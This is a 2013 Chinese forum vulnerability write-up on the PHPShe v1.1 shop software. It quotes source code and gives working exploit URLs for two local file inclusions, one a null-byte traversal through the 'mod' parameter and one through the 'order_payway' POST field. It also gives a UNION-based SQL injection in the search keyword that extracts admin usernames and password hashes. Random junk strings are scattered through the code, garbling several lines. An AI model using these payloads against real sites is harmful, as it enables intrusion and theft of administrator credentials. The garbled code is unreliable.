
phpshe v1.1多处SQL注入和文件包含漏洞Getshell

发表于 2013-4-16 16:45:03
/*******************************************************/
/* Phpshe v1.1 Vulnerability
/* ========================
/* By : Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
0×00 整体大概参数传输
+ c8 {, f' T+ X! L+ G+ E
% c6 l; [  E. f$ d/ x, m6 ]+ r
* y1 Y7 G' k; g

//common.php
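// Flatten request data into prefixed globals: $_g_* (GET), $_p_* (POST),
// $_s_* (SESSION), $_c_* (COOKIE). pe_trim()/pe_stripslashes() are not shown
// here; by name they only trim and unslash — nothing in this block validates
// or escapes the values, so every consumer of a $_g_*/$_p_*/$_c_* variable is
// responsible for that itself (the write-up's injection travels via $_g_keyword).
//
// get_magic_quotes_gpc() was removed in PHP 8; guard the call so the file still
// loads there. From PHP 5.4 on the function always returned false, so the
// unslash branch is only reached on very old interpreters.
if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
    !empty($_GET)  && extract(pe_trim(pe_stripslashes($_GET)),  EXTR_PREFIX_ALL, '_g');
    !empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
} else {
    !empty($_GET)  && extract(pe_trim($_GET),  EXTR_PREFIX_ALL, '_g');
    !empty($_POST) && extract(pe_trim($_POST), EXTR_PREFIX_ALL, '_p');
}

session_start();
// Session values are only trimmed; cookie values are unslashed unconditionally.
!empty($_SESSION) && extract(pe_trim($_SESSION), EXTR_PREFIX_ALL, '_s');
!empty($_COOKIE)  && extract(pe_trim(pe_stripslashes($_COOKIE)), EXTR_PREFIX_ALL, '_c');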
- X  e- j5 V# o& U( H" F" z5 k$ n1 f4 v7 v0 U
0×01 包含漏洞
1 r# H* o( M4 M
4 V$ g3 ]0 F4 n  n) {+ h
//首页文件
<?php
// Front controller: bootstrap common.php, load the cached lookup tables the
// templates read, then dispatch to module/{$module}/{$mod}.php.
include('common.php');

$cache_category     = cache::get('category');
$cache_category_arr = cache::get('category_arr');
$cache_class        = cache::get('class');
$cache_ad           = cache::get('ad');
$cache_link         = cache::get('link');
$cache_page         = cache::get('page');

// Customer-service QQ numbers are stored comma-separated in the settings cache.
$web_qq = array();
if ($cache_setting['web_qq']['setting_value']) {
    $web_qq = explode(',', $cache_setting['web_qq']['setting_value']);
}

// Cart badge: logged-in users count their rows in `cart`; guests carry the cart
// in the `cart_list` cookie, which common.php extracts as $_c_cart_list.
// NOTE(review): unserialize() runs here on a cookie value, i.e. on data the
// client fully controls. Deserializing untrusted input is its own risk class
// independent of the include issue below; a JSON encoding of the guest cart
// would avoid it.
if (pe_login('user')) {
    $cart_num = $db->pe_num('cart', array('user_id' => $_s_user_id));
} elseif (unserialize($_c_cart_list)) {
    $cart_num = count(unserialize($_c_cart_list));
} else {
    $cart_num = 0;
}

// $mod is taken straight from $_POST/$_GET in common.php's routing lines and
// no validation of it is visible before it reaches include() — this is the
// path-controllable include the write-up describes.
include("{$pe['path_root']}module/{$module}/{$mod}.php");
pe_result();
?>
//common 文件 第15行开始
url路由配置
// Request routing: a POST value wins over GET, and anything falsy ('', '0',
// unset) falls back to the default. $id has no default above this point, so a
// request without an id leaves it undefined (null).
// NOTE(review): these are raw request strings; nothing on these lines
// constrains their characters, and $mod later forms an include path in
// index.php while $id is handed on to the module code.
$module = $mod = $act = 'index';
$mod = $_POST['mod'] ?: ($_GET['mod'] ?: $mod);
$act = $_POST['act'] ?: ($_GET['act'] ?: $act);
$id  = $_POST['id']  ?: ($_GET['id']  ?: $id);
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
3 G! t' Q- ^, S


3 s+ Q- `5 W2 T( _, ~5 g 3 D9 d' f" n" \, L
0×02 搜索注入
  N+ P% C- s% m& G5 g$ Q9 b' e; k! V
<code id="code2">

//product.php文件
! t- ^( ]5 `3 K# i, fcase 'list':
' v# ~) v& o7 p. {! I& L: B$category_id = intval($id);
# @" R0 j, b+ l: k; d) {$info = $db->pe_select('category', array('category_id'=>$category_id));! T! R! Q4 Z; b7 k: F6 ]
//搜索
% C4 ^/ \, l0 l8 q# D$sqlwhere = " and `product_state` = 1";9 G1 L* u* h0 Y. l- \
pe_lead('hook/category.hook.php');$ K2 P( E. t% ~* `# Z: ^# ~
if ($category_id) {
1 Q4 Y  {( R6 c' c$ Lwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
  L7 `: s* y0 }1 m( B}
7 J( E7 ~# J! X* X* M( _: v$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
& S0 v3 W$ O1 P9 |. J- w: H# vif ($_g_orderby) {
% F' ~3 I$ E- h2 @" d$orderby = explode('_', $_g_orderby);
0 J+ T* O( d) o: Q4 \$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";, o4 R+ C& S* H4 J. }* l# g
}. J6 Q1 U# a/ |$ D, e, o& k* W+ {- m3 N
else {# K1 I! E9 x1 L, H- h9 S3 L
$sqlwhere .= " order by `product_id` desc";' m  `* D' o* g
}  q- f% Q/ U  V% p0 m
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));7 U& q, v" E3 w! t: F, C
//热卖排行$ [" G) i6 ~8 I# d, x
$product_hotlist = product_hotlist();
, R; _6 W: v$ B//当前路径/ j+ k5 d) X: i' W
$nowpath = category_path($category_id);9 ]6 n2 j) a7 {/ E4 N: r
$seo = pe_seo($info['category_name']);
0 C0 S  ~1 i- }- t- v5 Qinclude(pe_tpl('product_list.html'));8 T4 |% n# p& i; C8 Q6 Y
//跟进selectall函数库
/**
 * Select all rows of the prefixed table `dbpre$table` that match $where.
 *
 * @param string       $table      Table name without the `dbpre` prefix; interpolated verbatim.
 * @param string|array $where      Condition, normalised by _dowhere() (not shown here). The
 *                                 product-list caller passes a string built from the request
 *                                 keyword, and per this write-up it reaches the query unescaped,
 *                                 so string conditions must never carry raw request input.
 * @param string       $field      Column list; interpolated verbatim, no quoting is applied.
 * @param array        $limit_page Paging tuple passed through to sql_selectall().
 * @return mixed Whatever sql_selectall() returns.
 */
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
{
    $conditionSql = $this->_dowhere($where);
    $sql = sprintf('select %s from `%s%s` %s', $field, dbpre, $table, $conditionSql);

    return $this->sql_selectall($sql, $limit_page);
}
//exp
1 _- H$ e. i) q: ~0 m& u* ~% Yproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
3 v% M- f* \! Y& f* q( Y9 ?

</code>
+ E' r/ w6 C1 N  n9 B. {- I" Q, J
0×03 包含漏洞2
1 ?: l- Q8 f0 i0 j  i7 d) L
<code id="code3">

//order.php

case 'pay':

$ O7 i1 u! _) Z# P- {
$order_id = pe_dbhold($_g_id);


/ S, G: }/ r# ?4 U1 r1 J$cache_payway = cache::get('payway');


5 f1 J9 {6 s, @5 H5 [6 Kforeach($cache_payway as $k => $v) {


* W8 j8 u1 ?4 s( u7 m$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

3 r& ?' \2 j+ N3 e8 S9 O0 j
if ($k == 'bank') {

( h  e! q, t1 u. ~. P8 _
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


8 b, J0 u3 E- u8 _0 x0 {9 r  z6 g}

) e0 ]2 }/ |- x
}


9 v. O9 D8 M: j. X8 _( O" Z$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


) ?6 ]0 |+ Z6 ?: U!$order['order_id'] && pe_error('订单号错误...');


7 ?5 R" d9 D" o7 C  \if (isset($_p_pesubmit)) {


$ c6 U8 {3 V4 O8 ^0 P. z  uif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

" Y. v1 q" \* E6 P
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

; Z" ~6 y$ U9 [
foreach ($info_list as $v) {


( ]# P* G8 \. S/ Q$order['order_name'] .= "{$v['product_name']};";8 ^3 n7 u% q" r, M. u. s) j" R3 o

6 {% Y) ]+ Y  W
}


$ y; ^% h! s; d# {( e7 C/ Recho '正在为您连接支付网站,请稍后...';


1 g& k# a3 r4 j( [* i4 h% Y( qinclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

( X  a7 {2 z& G/ |4 s$ Y
}//当一切准备好的时候就可以进行"鸡肋包含了"


+ E% n. \. d( b7 aelse {

* P  Q2 }# h% o( Z4 o: I
pe_error('支付错误...');


* S) ?5 V1 s4 j6 r! I4 n}

$ Q, z% L, Z2 N9 ?' p' g* Y% f- h
}

7 ]' K5 |9 Y. B: ^, ?8 A( J% t: S
$seo = pe_seo('选择支付方式');

% S( X, F+ C4 @4 i( t
include(pe_tpl('order_pay.html'));

+ f7 {0 ?* h4 [4 B* @  ]( C
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
http://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg
